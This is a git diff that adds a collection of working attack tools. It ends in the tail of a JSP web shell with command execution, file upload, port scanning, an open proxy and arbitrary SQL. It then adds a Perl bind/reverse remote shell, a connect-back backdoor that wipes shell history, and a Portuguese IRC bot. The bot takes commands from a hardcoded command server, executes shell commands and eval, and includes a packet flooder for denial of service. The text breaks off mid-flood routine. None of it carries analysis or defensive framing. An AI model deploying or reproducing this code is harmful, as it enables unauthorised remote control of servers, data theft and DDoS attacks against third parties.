+    for(int i=0;i<interfaces.length;i++){
+        ifString=ifString+interfaces[i].getName()+",";
+    }
+    out.print("<strong>"+Modifier.toString(cls.getModifiers())+"</strong> "+cls+"<br><strong>extends</strong> "+supperClass+" <strong><br>implemets</strong> "+ifString);
+  
+    out.print("<br>{<br><EM>Constructor:</EM><br>");
+    for(int i=0;i<c.length;i++)
+        out.print("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"+c[i]+"<br>");
+    out.print("<EM>Field:</EM><br>");
+    for(int i=0;i<f.length;i++)
+        out.print("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"+f[i]+"<br>");
+    out.print("<EM>Function:</EM><br>");
+    for(int i=0;i<m.length;i++)
+        out.print("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"+m[i]+"<br>");
+    out.print("<br>}");
+}
+//scan the remote server port
+void scanPort(JspWriter out,String strAddress,int startPort,int endPort)throws Exception{
+    if(endPort<startPort||startPort<=0||startPort>65535||endPort>65535||endPort<=0){
+        out.print("port setup error");
+        return;
+    }
+    InetAddress ia=InetAddress.getByName(strAddress);
+    for(int p=startPort;p<=endPort;p+=15){
+        (new ScanPort(ia,p,p+14,out)).start();
+    }
+    Thread.sleep((int)(endPort/startPort)*5000);
+}//scan port class
+class ScanPort extends Thread{
+    int startPort;
+    int endPort;
+    InetAddress address;
+    javax.servlet.jsp.JspWriter out;
+    public ScanPort(InetAddress address,int startPort,int endPort,JspWriter out){
+        this.address=address;
+        this.startPort=startPort;
+        this.endPort=endPort;
+        this.out=out;
+    }
+    public void run(){
+       Socket s=null;
+       for(int port=startPort;port<=endPort;port++){
+           try{
+               s=new Socket(address,port);
+               out.println("port "+port+" is Open<br>");
+           }
+           catch(IOException e){
+           }finally{
+                try{s.close();}catch(Exception e){}
+           }
+       }
+    }
+}
+public void switchProxyService(JspWriter out)throws Exception{
+ if(openHttpProxy=!openHttpProxy){//open the proxy
+  new RunProxyService(portListen).start();
+  out.print("Proxy running");
+ }else{
+  out.print("Proxy closed");
+ }
+}
+//open httpProxy service
+public class RunProxyService extends Thread{
+ int port;
+ public RunProxyService(int port){
+  this.port=port;
+ }
+ public void run(){
+  try {
+   ServerSocket ss=new ServerSocket(5000);
+   while(true){
+    if(openHttpProxy){
+     new HttpProxy(ss.accept()).start();
+    }else{
+     break;
+    }
+   }
+   ss.close();
+  } catch (IOException e) {
+  }
+ }
+}
+//HttpProxy class
+public class HttpProxy extends Thread{
+ private Socket s;
+ public int timeOut=10000;
+ public HttpProxy(Socket s){
+  this.s=s;
+ }
+ public HttpProxy(Socket s,int timeOut){
+  this.s=s;
+  this.timeOut=timeOut;//set the connection timeout
+ }
+ public void run(){
+  byte[] bit=new byte[1024];
+  int readBit=0;
+  int size=0;
+  String returnAddress=null;//return to the address
+  int returnPort = 0; //return to the port
+  String sendHostName=null;
+  int sendPort=0;
+  Socket sendSocket=null;
+  OutputStream os=null;
+  InputStream is=null;
+  try{
+   int split=0;
+   
+   is=s.getInputStream();
+   //get the http head information
+   if((size=is.read(bit, 0, bit.length))==-1)return;
+   
+   String httpHead=new String(bit,0,size);
+   split=httpHead.indexOf("\nHost: ")+7;
+   sendHostName=httpHead.substring(split, httpHead.indexOf("\n", split));
+   //get the hostname and port
+   if((split=sendHostName.indexOf(':'))!=-1){
+    sendPort=Integer.parseInt(sendHostName.substring(split+1).trim());
+    sendHostName=sendHostName.substring(0,split);
+    sendSocket=new Socket(sendHostName.trim(),sendPort);
+   }else{
+    sendSocket=new Socket(sendHostName.trim(),80);
+   }
+   sendSocket.setSoTimeout(timeOut);
+   //send user headhttp
+   os=sendSocket.getOutputStream();
+   os.write(httpHead.getBytes());
+   //send user datas
+   if(size==bit.length)
+   while((size=is.read(bit, 0, bit.length))!=-1){
+    os.write(bit,0 , size);
+   }
+   os.flush();
+   //get WEBSITE html   and  user browser's output
+   is=sendSocket.getInputStream();
+   os=s.getOutputStream();
+   
+   while((size=is.read(bit, 0, bit.length))!=-1){
+    os.write(bit,0 , size);
+    os.flush();
+   }
+  }catch(SocketException se){
+  } catch (IOException ie) {
+  } catch (Exception e) {
+  }finally{
+   //close the stream
+   if(is!=null){
+    try {
+     is.close();
+    } catch (IOException e) {
+    }
+   }
+   if(os!=null){
+    try {
+     os.close();
+    } catch (IOException e) {
+    }
+   }
+  }
+ }
+}
+//connection to the database
+void ConnectionDBM(JspWriter out,String driver,String url,String userName,String passWord,String sqlAction,String sqlCmd)throws Exception{
+ DBM dbm=new DBM(driver,url,userName,passWord,out);
+ if(sqlAction.equals("LDB")){
+  dbm.lookInfo();
+ }else{
+  dbm.executeSQL(sqlCmd);
+ }
+ dbm.closeAll();
+}
+//database manager class
+class DBM{
+    private JspWriter out;
+    private Connection con;
+    private Statement stmt;
+    private ResultSet rs;
+    public DBM(String driverName,String url,String userName,String passWord,JspWriter out)throws Exception{
+        Class.forName(driverName); 
+        this.out=out;
+        con=DriverManager.getConnection(url,userName,passWord);
+    }
+    public void lookInfo()throws Exception{
+     DatabaseMetaData dbmd=con.getMetaData();
+     String tableType=null;
+     out.print("<strong>DataBaseInfo</strong><table>");
+     out.print("<tr><td>DataBaseName:</td><td>"+dbmd.getDatabaseProductName()+"</td></tr>");
+     out.print("<tr><td>DataBaseVersion:</td><td>"+dbmd.getDatabaseProductVersion()+"</td></tr>");
+     out.print("<tr><td>the Numeric Function:</td><td>"+dbmd.getNumericFunctions()+"</td></tr>");
+     out.print("<tr><td>the String Function:</td><td>"+dbmd.getStringFunctions()+"</td></tr>");
+     out.print("<tr><td>the TimeDate Function:</td><td>"+dbmd.getTimeDateFunctions()+"</td></tr>");
+     out.print("<tr><td>the System Function:</td><td>"+dbmd.getSystemFunctions()+"</td></tr>");
+     out.print("</table>");
+     out.print("<strong>ProcedureInfo</strong><table>");
+     try{
+      getProcedureDetail(dbmd.getProcedures(null,null,null));
+     }catch(Exception proE){}
+     
+     //show  all the tables
+     try{
+      rs=dbmd.getTables(null,null,null,null);
+     }catch(Exception tabE){}
+     out.print("<strong>DataBase Tables Info</strong><br>");
+     while(rs.next()){
+      tableType=rs.getString(4);
+      out.print("<strong>TableName:</strong>"+rs.getString(3)+" <strong>Type:</strong>"+tableType+"<br>");
+      if(tableType.indexOf("VIEW")>=0||tableType.indexOf("TABLE")>=0){
+       try{
+        getTableDetail(dbmd.getColumns(null,null,rs.getString(3),null));
+       }catch(Exception columnE){}
+      }
+     }
+     this.closeAll();
+    }
+    //show the column information
+    private void getTableDetail(ResultSet tableRs)throws Exception{
+        out.print("<table border=1><tr><td>COLUMN_NAME</td><td>DATA_TYPE</td><td>TYPE_NAME</td><td>COLUMN_SIZE</td><td>IS_NULLABLE</td><td>CHAR_OCTET_LENGTH</td></tr>");
+        while(tableRs.next()){
+            out.print("<tr><td>"+tableRs.getString(4)+"</td><td>"+tableRs.getInt(5)+"</td><td>"+tableRs.getString(6)+"</td><td>"+tableRs.getInt(7)+"</td><td>"+tableRs.getString(18)+"</td><td>"+tableRs.getInt(16)+"</td></tr>");
+        }
+        out.print("</table>");
+        tableRs.close();
+    }
+    //show all the procedures
+    private void getProcedureDetail(ResultSet procRs)throws Exception{
+     out.print("<table border=1><tr><td>PROCEDURE_NAME</td><td>REMARKS</td><td>PROCEDURE_TYPE</td></tr>");
+     while(procRs.next()){
+      out.print("<tr><td>"+procRs.getString(3)+"</td><td>"+procRs.getString(7)+"</td><td>"+procRs.getShort(8)+"</td></tr>");
+     }
+     out.print("</table>");
+     procRs.close();
+    }
+    //run the sql command
+    public void executeSQL(String sqlCmd)throws Exception{
+     stmt=con.createStatement();
+     if(sqlCmd.trim().toLowerCase().startsWith("select")){
+      rs=stmt.executeQuery(sqlCmd);
+      ResultSetMetaData rsmd=rs.getMetaData();
+      int ColumnCount=rsmd.getColumnCount();
+      out.print("<table border=1><tr>");
+      for(int i=1;i<=ColumnCount;i++){
+       out.print("<td>"+rsmd.getColumnName(i)+"</td>");
+      }
+      out.print("</tr>");
+      while(rs.next()){
+       out.print("</tr>");
+          for(int i=1;i<=ColumnCount;i++){
+           out.print("<td>"+rs.getString(i)+"</td>");
+          }
+          out.print("</tr>");
+      }
+     }else{
+      stmt.executeUpdate(sqlCmd);
+      out.print("execute success");
+     }
+     
+     
+    }
+    //close all the resource
+    public void closeAll()throws SQLException{
+        try{
+            if(rs!=null)rs.close();
+        }catch(Exception e){
+        }
+        try{
+            if(stmt!=null)stmt.close();
+        }catch(Exception e){
+        }
+        try{
+         if(con!=null)con.close();
+        }catch(Exception e){
+        }
+    }
+}
+//the other tools
+void systemTools(JspWriter out)throws Exception{
+    out.print("<table border=1>");
+    out.print("<tr><form method=post action='?Action=run'><td bordercolorlight=Black bgcolor=menu>System class run</td>");
+    out.print("<td colspan=2>filepath:<input name=execFile size=75 type=text title='example d:\\cmd.exe /c dir c:'></td><td><input name=go type=submit value=run></td></form></tr>");
+    out.print("<tr><form method=post enctype=\"multipart/form-data\" action='?Action=Upfile'><td bordercolorlight=Black bgcolor=menu>file upload</td>");
+    out.print("<td colspan=2>file:<input name=file type=file>up to file<input title='d:\\1.txt' name=UPaddress size=35 type=text></td><td><input name=up onclick=\"this.form.action+='&UPaddress='+this.form.UPaddress.value;\" type=submit value=upl></td></form></tr>");
+    out.print("<tr><form method=post action='?Action=EditFile'><td bordercolorlight=Black bgcolor=menu>new file</td><td colspan=2>file full name:<input name=Filename type=text size=50></td><td><input name=submit type=submit value=new></td>");
+    out.print("</form></tr>");
+    out.print("<tr><form method=post action='?Action=newFolder'><td bordercolorlight=Black bgcolor=menu>Create folder</td><td colspan=2>folder fullname:<input name=Filename type=text size=50></td><td><input name=submit type=submit value=new></td>");
+    out.print("</form></tr>");
+    out.print("<tr><form method=post action='?Action=APIreflect'><td bordercolorlight=Black bgcolor=menu>Reflect API</td><td colspan=2>Class Name:<input name=Filename title=java.lang.String type=text size=50></td><td><input name=submit type=submit value=ref></td>");
+    out.print("</form></tr>");
+    out.print("<tr><form method=post action='?Action=IPscan'><td bordercolorlight=Black bgcolor=menu>Scan Port</td><td>IP:<input name=IPaddress type=text size=20></td><td>Start Port:<input name=startPort title=1-65535 type=text size=5>End Port:<input name=endPort title=1-65535 type=text size=5></td><td><input name=submit type=submit value=sca></td>");
+    out.print("</form></tr>");
+    out.print("<tr><form method=post action='?Action=sql'>");
+    out.print("<td bordercolorlight=Black bgcolor=menu>DBM");
+    out.print("<select name=DB onChange='setDataBase(this.form);'><option>Sybase</option><option>Mssql</option><option>Mysql</option><option>Oracle</option><option>DB2</option><option>PostgreSQL</option></select></td><td>");
+    out.print("Driver:<input name=driver type=text>URL:<input name=conUrl type=text>user:<input name=user type=text size=3>password:<input name=password type=text size=3></td>");
+    out.print("<td>SqlCmd:<input type=text name=sqlcmd title='select * from admin'><input name=run type=submit value=Exec></td>");
+    out.print("<td><input name=run type=submit value=LDB></td>");
+    out.print("</form></tr>");
+    if(!openHttpProxy){
+     out.print("<tr><td><a href='?Action=HttpProxy' target=FileFrame>OpenTheHttpProxy</a></td></tr>");
+    }else{
+     out.print("<tr><td><a href='?Action=HttpProxy' target=FileFrame>CloseTheHttpProxy</a></td></tr>");
+    }
+    out.print("</table>");
+}
+//user interfaces==========================//
+void userInterFaces(JspWriter out)throws Exception{
+ out.print("if u want to add an function ,u can coding in 'userInterFaces'function");
+ 
+}
+//=========================================//
+%>
+
+ 
+
+
+<%!
+String encodeChange(String str)throws Exception{
+    if(str==null)
+        return null;
+    else
+        return new String(str.getBytes("ISO-8859-1"),"gb2312");
+}
+String folderReplace(String folder){
+    return folder.replace('\\','/');
+}
+String fOperation(boolean f,String file){
+    if(f)
+        return "<a href=\"javascript:delFile('"+folderReplace(file)+"')\">Delete</a> <a href=\"javascript:reName('"+folderReplace(file)+"')\">Rename</a> <a href=\"javascript:setDate('"+folderReplace(file)+"')\">setDate</a> <a href=\"javascript:zipFile('"+folderReplace(file)+"')\">Zip</a>";
+    else
+        return "<a href=\"javascript:delFile('"+folderReplace(file)+"')\">Delete</a> <a href=\"javascript:reName('"+folderReplace(file)+"')\">Rename</a> <a href=\"javascript:setDate('"+folderReplace(file)+"')\">setDate</a> <a href=\"javascript:copyFile('"+folderReplace(file)+"')\">Copy</a> <a href=\"javascript:editFile('"+folderReplace(file)+"')\">Edit</a> <a href=\"javascript:downFile('"+folderReplace(file)+"');\">Down</a>";
+}
+String getSize(long size){
+    if(size>=1024*1024*1024){
+        return new Long(size/1073741824L)+"G";
+    }else if(size>=1024*1024){
+        return new Long(size/1048576L)+"M";
+    }else if(size>=1024){
+        return new Long(size/1024)+"K";
+    }else
+        return size+"B";
+}
+String ico(int num){//ico
+    return "<font face=wingdings size=3>&#"+num+"</font>";
+}
+String htmlEntity(String htmlCode){//html uncode
+ htmlCode=htmlCode.replaceAll("&","&amp;");
+ htmlCode=htmlCode.replaceAll("<","&lt;");
+ return htmlCode.replaceAll(">","&gt;");
+}
+%>
\ No newline at end of file
diff --git a/xakep-shells/PERL/Asmodeus v0.1.pl.txt b/xakep-shells/PERL/Asmodeus v0.1.pl.txt
new file mode 100644
index 0000000..600036d
--- /dev/null
+++ b/xakep-shells/PERL/Asmodeus v0.1.pl.txt	
@@ -0,0 +1,131 @@
+#!/usr/bin/perl
+
+#
+
+#   Asmodeus v0.1
+
+#   Perl Remote Shell
+
+#   by phuket
+
+#   www.smoking-gnu.org
+
+#
+
+#   (Server is based on some code found on [url=http://www.governmentsecurity.org)]www.governmentsecurity.org)[/url]
+
+#   
+
+
+
+#   perl asmodeus.pl client 6666 127.0.0.1
+
+#   perl asmodeus.pl server 6666
+
+#
+
+
+
+
+
+use Socket;
+
+
+
+$cs=$ARGV[0];
+
+$port=$ARGV[1];
+
+$host=$ARGV[2];
+
+
+
+if ($cs eq 'client') {&client}
+
+elsif ($cs eq 'server') {&server}
+
+
+
+
+
+
+
+
+
+sub client{
+
+socket(TO_SERVER, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
+
+$internet_addr = inet_aton("$host") or die "ALOA:$!\n";
+
+$paddr=sockaddr_in("$port", $internet_addr);
+
+connect(TO_SERVER, $paddr) or die "$port:$internet_addr:$!\n";
+
+open(STDIN, ">&TO_SERVER");
+
+open(STDOUT, ">&TO_SERVER");
+
+open(STDERR, ">&TO_SERVER");
+
+print "Asmodeus Perl Remote Shell\n";
+
+system(date);
+
+system("/bin/sh");
+
+close(TO_SERVER);
+
+}
+
+
+
+
+
+
+
+
+
+
+
+sub server{
+
+$proto=getprotobyname('tcp');
+
+$0="asm";
+
+$system='/bin/sh';
+
+socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
+
+setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
+
+bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
+
+listen(SERVER, SOMAXCONN) or die "listen: $!";
+
+for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
+
+  open(STDIN, ">&CLIENT");
+
+  open(STDOUT, ">&CLIENT");
+
+  open(STDERR, ">&CLIENT");
+
+  print "Asmodeus Perl Remote Shell\n";
+
+  system(date);
+
+  system("/bin/sh");
+
+  close(STDIN);
+
+  close(STDOUT);
+
+  close(STDERR);
+
+  return;
+
+}
+
+}
\ No newline at end of file
diff --git a/xakep-shells/PERL/connectback2.pl.txt b/xakep-shells/PERL/connectback2.pl.txt
new file mode 100644
index 0000000..f4571e6
--- /dev/null
+++ b/xakep-shells/PERL/connectback2.pl.txt
@@ -0,0 +1,61 @@
+#!/usr/bin/perl
+use IO::Socket;
+#WwW.CoM Security Hackers          
+#coded bY: MasterKid
+#We Are: MasterKid, AleXutz, FatMan & MiKuTuL                                          
+#Email: muzicteam2006@yahoo.com
+#
+#kid@SlackwareLinux:/home/programing$ perl dc.pl
+#--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--
+#
+#Usage: dc.pl [Host] [Port]
+#
+#Ex: dc.pl 127.0.0.1 2121
+#kid@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
+#--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--
+#
+#[*] Resolving HostName
+#[*] Connecting... 127.0.0.1
+#[*] Spawning Shell
+#[*] Connected to remote host
+
+#bash-2.05b# nc -vv -l -p 2121
+#listening on [any] 2121 ...
+#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
+#--== ConnectBack Backdoor vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--
+#
+#--==Systeminfo==--
+#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
+#
+#--==Userinfo==--
+#uid=1001(lord) gid=100(users) groups=100(users)
+#
+#--==Directory==--
+#/root
+#
+#--==Shell==--
+#
+$system	= '/bin/sh';
+$ARGC=@ARGV; 
+print "--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==-- \n\n"; 
+if ($ARGC!=2) { 
+   print "Usage: $0 [Host] [Port] \n\n"; 
+   die "Ex: $0 127.0.0.1 2121 \n"; 
+} 
+use Socket; 
+use FileHandle; 
+socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; 
+connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; 
+print "[*] Resolving HostName\n";
+print "[*] Connecting... $ARGV[0] \n"; 
+print "[*] Spawning Shell \n";
+print "[*] Connected to remote host \n";
+SOCKET->autoflush(); 
+open(STDIN, ">&SOCKET"); 
+open(STDOUT,">&SOCKET"); 
+open(STDERR,">&SOCKET"); 
+print "--== ConnectBack Backdoor vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--  \n\n"; 
+system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
+echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- "); 
+system($system);
+#EOF
\ No newline at end of file
diff --git a/xakep-shells/PERL/perlbot.pl.txt b/xakep-shells/PERL/perlbot.pl.txt
new file mode 100644
index 0000000..1c590e0
--- /dev/null
+++ b/xakep-shells/PERL/perlbot.pl.txt
@@ -0,0 +1,687 @@
+#!/usr/bin/perl
+# ========================= 
+# Perl Bot by LKY 
+# Obrigado a italo, false e Ragde :D
+# ========================= 
+
+# Componentes
+use IO::Socket;
+use Socket;
+use IO::Select;
+
+# Configura??es
+my $servidor        ='208.98.16.20';
+my $porta           ='9002';
+my $nick            =DDos;
+my $ircname         = 'DDos';
+my $realname        = "DDos";
+my @canais=("#SSH");
+my @adms=("Kelserific","Puna","nod32");
+#my $processo = '/bin/bash';    #se comantar nao mostra o PID
+
+#Flood Control
+my $linas_max=6;
+my $sleep=3;
+
+#Acesso a Shel - 1 ON 0 OFF
+my $secv = 1;
+
+##############################
+my $VERSAO = '0.1';
+
+$SIG{'INT'} = 'IGNORE';
+$SIG{'HUP'} = 'IGNORE';
+$SIG{'TERM'} = 'IGNORE';
+$SIG{'CHLD'} = 'IGNORE';
+$SIG{'PS'} = 'IGNORE';
+
+chdir("/tmp/");
+$servidor="$ARGV[0]" if $ARGV[0];
+$0="$processo"."\0"x16;;
+my $pid=fork;
+exit if $pid;
+die "Problema com o fork: $!" unless defined($pid);
+
+#diretorio,config do server e pid
+
+chdir("/");
+$servidor="$ARGV[0]" if $ARGV[0];
+$0="$processo"."\0"x16;;
+my $pid=fork;
+exit if $pid;
+die "Problema com o fork: $!" unless defined($pid);
+
+our %irc_servers;
+our %DCC;
+my $dcc_sel = new IO::Select->new();
+
+#######
+#Bot em si!
+#######
+
+$sel_cliente = new IO::Select();
+sub sendraw {
+  if ($#_ == '1') {
+    my $socket = $_[0];
+    print $socket "$_[1]\n";
+  } else {
+      print $IRC_cur_socket "$_[0]\n";
+  }
+}
+
+sub conectar {
+   my $meunick = $_[0];
+   my $servidor_con = $_[1];
+   my $porta_con = $_[2];
+
+   my $IRC_socket = new IO::Socket::INET(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
+   if (defined($IRC_socket)) {
+     $IRC_cur_socket = $IRC_socket;
+
+     $IRC_socket->autoflush(1);
+     $sel_cliente->add($IRC_socket);
+
+     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
+     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
+     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
+     nick("$meunick");
+     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
+     sleep 1;
+   }
+
+}
+my $line_temp;
+while( 1 ) {
+   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
+   delete($irc_servers{''}) if (defined($irc_servers{''}));
+   &DCC::connections;
+   my @ready = $sel_cliente->can_read(0);
+   next unless(@ready);
+   foreach $fh (@ready) {
+     $IRC_cur_socket = $fh;
+     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
+     $nread = sysread($fh, $msg, 4096);
+     if ($nread == 0) {
+        $sel_cliente->remove($fh);
+        $fh->close;
+        delete($irc_servers{$fh});
+     }
+     @lines = split (/\n/, $msg);
+
+     for(my $c=0; $c<= $#lines; $c++) {
+       $line = $lines[$c];
+       $line=$line_temp.$line if ($line_temp);
+       $line_temp='';
+       $line =~ s/\r$//;
+       unless ($c == $#lines) {
+         parse("$line");
+       } else {
+           if ($#lines == 0) {
+             parse("$line");
+           } elsif ($lines[$c] =~ /\r$/) {
+               parse("$line");
+           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
+               parse("$line");
+           } else {
+               $line_temp = $line;
+           }
+       }
+      }
+   }
+}
+
+
+ 
+sub parse {
+   my $servarg = shift;
+   if ($servarg =~ /^PING \:(.*)/) {
+     sendraw("PONG :$1");
+   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
+       my $pn=$1; my $onde = $4; my $args = $5;
+       if ($args =~ /^\001VERSION\001$/) {
+         notice("$pn", "\001VERSION LKY bot-$VERSAO\001");
+       }
+       if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
+         if ($onde eq "$meunick"){
+           shell("$pn", "$args");
+         }
+         if ($args =~ /^(\Q$meunick\E|\!hdr)\s+(.*)/ ) {
+            my $natrix = $1;
+            my $arg = $2;
+            if ($arg =~ /^\!(.*)/) {
+              ircase("$pn","$onde","$1") unless ($natrix eq "!hdr" and $arg =~ /^\!nick/);
+            } elsif ($arg =~ /^\@(.*)/) {
+                $ondep = $onde;
+                $ondep = $pn if $onde eq $meunick;
+                bfunc("$ondep","$1");
+            } else {
+                shell("$onde", "$arg");
+            }
+         } 
+       }
+   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
+       if (lc($1) eq lc($meunick)) {
+         $meunick=$4; 
+         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+       }
+   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
+       nick("$meunick".int rand(9999));
+   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
+       $meunick = $2;
+       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
+       foreach my $canal (@canais) {
+         sendraw("JOIN $canal");
+       }
+   }
+}
+
+sub bfunc {
+  my $printl = $_[0];
+  my $funcarg = $_[1];
+  if (my $pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           if ($funcarg =~ /^portscan (.*)/) {
+             my $hostip="$1";
+             my @portas=("21","22","23","25","53","80","110","143","6667","59","7000","110","65535","0");
+             my (@aberta, %porta_banner);
+             foreach my $porta (@portas)  {
+                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
+                if ($scansock) {
+                   push (@aberta, $porta);
+                   $scansock->close;
+                }
+             }
+
+             if (@aberta) {
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :portas abertas: @aberta");
+             } else {
+                 sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada"); 
+             }
+           }
+           if ($funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
+             my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
+             $dtime = 1 if $dtime == 0;
+             my %bytes;
+             $bytes{igmp} = $2 * $pacotes{igmp};
+             $bytes{icmp} = $2 * $pacotes{icmp};
+             $bytes{o} = $2 * $pacotes{o};
+             $bytes{udp} = $2 * $pacotes{udp};
+             $bytes{tcp} = $2 * $pacotes{tcp};
+            
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :4STATUS - LKY");
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :14Tempo:1 $dtime"."s");
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :14Total pacotes:1 ".($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} +  $pacotes{o}));
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :14Total bytes:1 ".($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o}));
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :14M?dia de envio:4 ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps");
+
+
+           }
+           exit;
+       }
+  }
+}
+ 
+sub ircase {
+  my ($kem, $printl, $case) = @_;
+
+  if ($case =~ /^join (.*)/) {
+     j("$1");
+   } 
+   if ($case =~ /^part (.*)/) {
+      p("$1");
+   }
+   if ($case =~ /^rejoin\s+(.*)/) {
+      my $chan = $1;
+      if ($chan =~ /^(\d+) (.*)/) {
+        for (my $ca = 1; $ca <= $1; $ca++ ) {
+          p("$2");
+          j("$2");
+        }
+      } else {
+          p("$chan");
+          j("$chan");
+      }
+   }
+   if ($case =~ /^op/) {
+      op("$printl", "$kem") if $case eq "op";
+      my $oarg = substr($case, 3);
+      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^deop/) {
+      deop("$printl", "$kem") if $case eq "deop";
+      my $oarg = substr($case, 5);
+      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^voice/) {
+      voice("$printl", "$kem") if $case eq "voice";
+      $oarg = substr($case, 6);
+      voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^devoice/) {
+      devoice("$printl", "$kem") if $case eq "devoice";
+      $oarg = substr($case, 8);
+      devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^msg\s+(\S+) (.*)/) {
+      msg("$1", "$2");
+   }
+   if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my $cf = 1; $cf <= $1; $cf++) {
+        msg("$2", "$3");
+      }
+   }
+   if ($case =~ /^ctcp\s+(\S+) (.*)/) {
+      ctcp("$1", "$2");
+   }
+   if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my $cf = 1; $cf <= $1; $cf++) {
+        ctcp("$2", "$3");
+      }
+   }
+   if ($case =~ /^invite\s+(\S+) (.*)/) {
+      invite("$1", "$2");
+   }
+   if ($case =~ /^nick (.*)/) {
+      nick("$1");
+   }
+   if ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {
+       conectar("$2", "$1", 6667);
+   }
+   if ($case =~ /^send\s+(\S+)\s+(\S+)/) {
+      DCC::SEND("$1", "$2");
+   }
+   if ($case =~ /^raw (.*)/) {
+      sendraw("$1");
+   }
+   if ($case =~ /^eval (.*)/) {
+     eval "$1";
+   }
+}
+sub shell {
+  return unless $secv;
+  my $printl=$_[0];
+  my $comando=$_[1];
+  if ($comando =~ /cd (.*)/) {
+    chdir("$1") || msg("$printl", "Diert?? inexistente!");
+    return;
+  } 
+  elsif ($pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           my @resp=`$comando 2>&1 3>&1`;
+           my $c=0;
+           foreach my $linha (@resp) {
+             $c++;
+             chop $linha;
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
+             if ($c == "$linas_max") {
+               $c=0;
+               sleep $sleep;
+             }
+           }
+           exit;
+       }
+  }
+}
+
+#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
+sub attacker {
+  my $iaddr = inet_aton($_[0]);
+  my $msg = 'B' x $_[1];
+  my $ftime = $_[2];
+  my $cp = 0;
+  my (%pacotes);
+  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
+  
+  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
+  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
+  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
+  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
+  return(undef) if $cp == 4;
+  my $itime = time;
+  my ($cur_time);
+  while ( 1 ) {
+     for (my $porta = 1; $porta <= 65535; $porta++) {
+       $cur_time = time - $itime;
+       last if $cur_time >= $ftime;
+       send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
